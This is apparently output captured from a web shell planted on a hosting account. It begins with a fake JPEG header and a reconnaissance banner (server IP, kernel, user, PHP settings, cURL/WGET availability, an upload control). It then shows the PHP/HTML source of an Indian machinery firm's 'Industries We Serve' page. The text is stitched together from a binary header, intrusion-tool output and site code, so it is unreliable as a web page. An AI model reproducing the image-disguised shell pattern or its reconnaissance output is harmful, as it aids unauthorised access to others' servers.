���� JFIF fdasasfas213sdaf
Server IP : 91.108.106.130 / Your IP : 216.73.216.200 Web Server : LiteSpeed System : Linux in-mum-web669.main-hosting.eu 5.14.0-503.23.2.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 12 05:52:18 EST 2025 x86_64 User : u479334040 ( 479334040) PHP Version : 8.2.27 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/u479334040/domains/hiltonmachinery.co.in/public_html/ |
Upload File : |
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Industries We Serve | Hilton Machinery</title> <?php include 'assets.php'; ?> </head> <style> .In_dust_ries img{ width: 360px; height: 250px; object-fit: cover; object-position: center; } </style> <body> <?php include 'header.php'; ?> <!--Page Title--> <section class="page-banner style-two" style="background-image:url(images/background/about-page-title-bg.jpg);"> <div class="auto-container"> <div class="inner-container clearfix"> <h1>Industries We Serve</h1> <ul class="bread-crumb clearfix"> <li><a href="index.php">Home</a></li> <li>Industries We Serve</li> </ul> </div> </div> </section> <!-- Services Section Three --> <section class="services-section-three style-two"> <div class="auto-container"> <!-- Sec Title --> <div class="title-style-one style-two centered"> <h2 class="px-lg-5 px-0">Industries We Serve</h2> <div class="text"> At Hilton Machinery, we take pride in catering to a wide array of industries with our high-quality, precision-engineered machinery. Our expertise spans across diverse sectors, ensuring tailored solutions to meet unique operational requirements. </div> </div> <div class="row In_dust_ries"> <!-- Services Block Three --> <div class="services-block-three col-xl-4 col-lg-6 col-md-6 col-sm-12"> <div class="inner-box wow fadeInUp" data-wow-delay="0ms" data-wow-duration="1500ms"> <div class="image"> <a href="pharma-bottle.php"><img src="img/industries/1.jpg" alt="" /></a> </div> <div class="lower-content"> <h3><a href="pharma-bottle.php">Pharma Bottle</a></h3> <div class="text"> We provide advanced machinery designed to meet the stringent standards of the pharmaceutical sector. From precision mixing to automated packaging, our solutions enhance efficiency, quality, and compliance in medicine and drug manufacturing. </div> <a href="pharma-bottle.php" class="read-more">Read More <span class="fas fa-angle-right"></span></a> </div> </div> </div> <!-- Services Block Three --> <div class="services-block-three col-xl-4 col-lg-6 col-md-6 col-sm-12"> <div class="inner-box wow fadeInUp" data-wow-delay="0ms" data-wow-duration="1500ms"> <div class="image"> <a href="food-bottle.php"><img src="img/industries/2.jpg" alt="" /></a> </div> <div class="lower-content"> <h3><a href="food-bottle.php">Food Bottle</a></h3> <div class="text"> Our innovative machinery supports the food industry in achieving consistent quality and hygiene standards. Whether it’s for mixing, processing, or packaging, we ensure safe and efficient solutions that streamline production. </div> <a href="food-bottle.php" class="read-more">Read More <span class="fas fa-angle-right"></span></a> </div> </div> </div> <!-- Services Block Three --> <div class="services-block-three col-xl-4 col-lg-6 col-md-6 col-sm-12"> <div class="inner-box wow fadeInUp" data-wow-delay="0ms" data-wow-duration="1500ms"> <div class="image"> <a href="cosmetic-bottle.php"><img src="img/industries/3.jpg" alt="" /></a> </div> <div class="lower-content"> <h3><a href="cosmetic-bottle.php">Cosmetic Bottle</a></h3> <div class="text"> Hilton Machinery offers specialized equipment for the cosmetic sector, enabling precise formulation, blending, and packaging of a wide variety of products, from creams and lotions to powders and liquids. </div> <a href="cosmetic-bottle.php" class="read-more">Read More <span class="fas fa-angle-right"></span></a> </div> </div> </div> <!-- Services Block Three --> <div class="services-block-three col-xl-4 col-lg-6 col-md-6 col-sm-12"> <div class="inner-box wow fadeInUp" data-wow-delay="0ms" data-wow-duration="1500ms"> <div class="image"> <a href="lubricant-bottle.php"><img src="img/industries/4.jpg" alt="" /></a> </div> <div class="lower-content"> <h3><a href="lubricant-bottle.php">Lubricant Bottle</a></h3> <div class="text"> Our robust and efficient machinery is tailored to handle the complexities of lubricant manufacturing, including blending, filling, and sealing processes. We focus on durability and reliability for seamless production. </div> <a href="lubricant-bottle.php" class="read-more">Read More <span class="fas fa-angle-right"></span></a> </div> </div> </div> </div> </div> </section> <?php include 'footer.php'; ?> </body> </html>